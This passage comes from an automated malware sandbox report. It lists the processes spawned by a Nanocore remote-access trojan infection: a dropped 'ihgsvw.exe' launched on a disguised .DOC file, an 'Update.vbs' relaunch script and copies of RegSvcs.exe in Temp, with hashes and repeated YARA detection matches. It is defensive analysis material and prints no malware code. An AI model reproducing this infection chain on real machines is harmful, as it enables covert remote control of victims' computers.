              MD5 hash:2867A3817C9245F7CF518524DFD18F28
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:.Net C# or VB.NET

              Target ID:24
              Start time:17:52:23
              Start date:03/02/2023
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff6edaf0000
              File size:625664 bytes
              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language

              Target ID:25
              Start time:17:52:28
              Start date:03/02/2023
              Path:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
              Wow64 process (32bit):true
              Commandline:C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe
              Imagebase:0xa50000
              File size:45152 bytes
              MD5 hash:2867A3817C9245F7CF518524DFD18F28
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:.Net C# or VB.NET

              Target ID:26
              Start time:17:52:33
              Start date:03/02/2023
              Path:C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user~1\AppData\Local\Temp\FOLDER~1\ihgsvw.exe" C:\Users\user~1\AppData\Local\Temp\FOLDER~1\CCMBPO~1.DOC
              Imagebase:0xba0000
              File size:1357068 bytes
              MD5 hash:797174324A2A71F55AD4E89DA918B52D
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001A.00000003.407827944.00000000012FC000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001A.00000003.407827944.00000000012FC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000001A.00000003.407827944.00000000012FC000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 0000001A.00000003.407827944.00000000012FC000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001A.00000003.408428728.0000000001293000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001A.00000003.408428728.0000000001293000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000001A.00000003.408428728.0000000001293000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 0000001A.00000003.408428728.0000000001293000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001A.00000003.408249022.0000000001300000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001A.00000003.408249022.0000000001300000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000001A.00000003.408249022.0000000001300000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 0000001A.00000003.408249022.0000000001300000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001A.00000003.408583600.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001A.00000003.408583600.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000001A.00000003.408583600.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 0000001A.00000003.408583600.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001A.00000003.408839619.00000000012C7000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001A.00000003.408839619.00000000012C7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000001A.00000003.408839619.00000000012C7000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 0000001A.00000003.408839619.00000000012C7000.00000004.00000020.00020000.00000000.sdmp, Author: unknown

              Target ID:27
              Start time:17:52:41
              Start date:03/02/2023
              Path:C:\Windows\System32\wscript.exe
              Wow64 process (32bit):false
              Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\FOLDER~1\Update.vbs"
              Imagebase:0x7ff6f21c0000
              File size:163840 bytes
              MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language

              Target ID:28
              Start time:17:52:44
              Start date:03/02/2023
              Path:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
              Wow64 process (32bit):true
              Commandline:C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe
              Imagebase:0x950000
              File size:45152 bytes
              MD5 hash:2867A3817C9245F7CF518524DFD18F28
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:.Net C# or VB.NET

              Target ID:29
              Start time:17:52:44
              Start date:03/02/2023
              Path:C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user~1\AppData\Local\Temp\FOLDER~1\ihgsvw.exe" C:\Users\user~1\AppData\Local\Temp\FOLDER~1\CCMBPO~1.DOC
              Imagebase:0xba0000
              File size:1357068 bytes
              MD5 hash:797174324A2A71F55AD4E89DA918B52D
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001D.00000003.431923501.0000000003C1A000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001D.00000003.431923501.0000000003C1A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000001D.00000003.431923501.0000000003C1A000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 0000001D.00000003.431923501.0000000003C1A000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001D.00000003.431564388.00000000012A2000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001D.00000003.431564388.00000000012A2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000001D.00000003.431564388.00000000012A2000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 0000001D.00000003.431564388.00000000012A2000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001D.00000003.430480318.00000000012D6000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001D.00000003.430480318.00000000012D6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000001D.00000003.430480318.00000000012D6000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 0000001D.00000003.430480318.00000000012D6000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001D.00000003.430608111.000000000130B000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001D.00000003.430608111.000000000130B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000001D.00000003.430608111.000000000130B000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 0000001D.00000003.430608111.000000000130B000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001D.00000003.432175450.00000000012D5000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001D.00000003.432175450.00000000012D5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000001D.00000003.432175450.00000000012D5000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 0000001D.00000003.432175450.00000000012D5000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001D.00000003.431239930.000000000132B000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001D.00000003.431239930.000000000132B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000001D.00000003.431239930.000000000132B000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 0000001D.00000003.431239930.000000000132B000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001D.00000003.430740099.000000000133E000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001D.00000003.430740099.000000000133E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000001D.00000003.430740099.000000000133E000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 0000001D.00000003.430740099.000000000133E000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001D.00000003.431128106.000000000130F000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001D.00000003.431128106.000000000130F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000001D.00000003.431128106.000000000130F000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 0000001D.00000003.431128106.000000000130F000.00000004.00000020.00020000.00000000.sdmp, Author: unknown

              Target ID:32
              Start time:17:52:55
              Start date:03/02/2023
              Path:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
              Wow64 process (32bit):true
              Commandline:C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe
              Imagebase:0xf30000
              File size:45152 bytes
              MD5 hash:2867A3817C9245F7CF518524DFD18F28
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:.Net C# or VB.NET

              Target ID:33
              Start time:17:52:56
              Start date:03/02/2023
              Path:C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user~1\AppData\Local\Temp\FOLDER~1\ihgsvw.exe" C:\Users\user~1\AppData\Local\Temp\FOLDER~1\CCMBPO~1.DOC
              Imagebase:0xba0000
              File size:1357068 bytes
              MD5 hash:797174324A2A71F55AD4E89DA918B52D
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000021.00000003.467106466.0000000000F6E000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000021.00000003.467106466.0000000000F6E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000021.00000003.467106466.0000000000F6E000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000021.00000003.467106466.0000000000F6E000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000021.00000003.467835981.0000000000F05000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000021.00000003.467835981.0000000000F05000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000021.00000003.467835981.0000000000F05000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000021.00000003.467835981.0000000000F05000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000021.00000003.468424506.0000000000F38000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000021.00000003.468424506.0000000000F38000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000021.00000003.468424506.0000000000F38000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000021.00000003.468424506.0000000000F38000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000021.00000003.467996815.00000000039C0000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000021.00000003.467996815.00000000039C0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000021.00000003.467996815.00000000039C0000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000021.00000003.467996815.00000000039C0000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000021.00000003.467618128.0000000000F72000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000021.00000003.467618128.0000000000F72000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000021.00000003.467618128.0000000000F72000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000021.00000003.467618128.0000000000F72000.00000004.00000020.00020000.00000000.sdmp, Author: unknown

              Target ID:34
              Start time:17:53:05
              Start date:03/02/2023
              Path:C:\Windows\System32\wscript.exe
              Wow64 process (32bit):false
              Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\FOLDER~1\Update.vbs"
              Imagebase:0x7ff6f21c0000
              File size:163840 bytes
              MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language

              Target ID:35
              Start time:17:53:06
              Start date:03/02/2023
              Path:C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user~1\AppData\Local\Temp\FOLDER~1\ihgsvw.exe" C:\Users\user~1\AppData\Local\Temp\FOLDER~1\CCMBPO~1.DOC
              Imagebase:0xba0000
              File size:1357068 bytes
              MD5 hash:797174324A2A71F55AD4E89DA918B52D
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000023.00000003.486991212.00000000017DF000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000023.00000003.486991212.00000000017DF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000023.00000003.486991212.00000000017DF000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000023.00000003.486991212.00000000017DF000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000023.00000003.487823598.00000000042C1000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000023.00000003.487823598.00000000042C1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000023.00000003.487823598.00000000042C1000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000023.00000003.487823598.00000000042C1000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000023.00000003.482858075.0000000001810000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000023.00000003.482858075.0000000001810000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000023.00000003.482858075.0000000001810000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000023.00000003.482858075.0000000001810000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000023.00000003.487203996.00000000017FB000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000023.00000003.487203996.00000000017FB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000023.00000003.487203996.00000000017FB000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000023.00000003.487203996.00000000017FB000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000023.00000003.487454794.0000000001773000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000023.00000003.487454794.0000000001773000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000023.00000003.487454794.0000000001773000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000023.00000003.487454794.0000000001773000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000023.00000003.488033967.00000000017A7000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000023.00000003.488033967.00000000017A7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000023.00000003.488033967.00000000017A7000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000023.00000003.488033967.00000000017A7000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000023.00000003.481255588.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000023.00000003.481255588.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000023.00000003.481255588.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000023.00000003.481255588.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000023.00000003.481046485.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000023.00000003.481046485.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000023.00000003.481046485.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000023.00000003.481046485.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown

              Target ID:36
              Start time:17:53:12
              Start date:03/02/2023
              Path:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
              Wow64 process (32bit):true
              Commandline:C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe
              Imagebase:0x7b0000
              File size:45152 bytes
              MD5 hash:2867A3817C9245F7CF518524DFD18F28
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:.Net C# or VB.NET

              Target ID:37
              Start time:17:53:20
              Start date:03/02/2023
              Path:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
              Wow64 process (32bit):true
              Commandline:C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe
              Imagebase:0xa0000
              File size:45152 bytes
              MD5 hash:2867A3817C9245F7CF518524DFD18F28
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:.Net C# or VB.NET

              No disassembly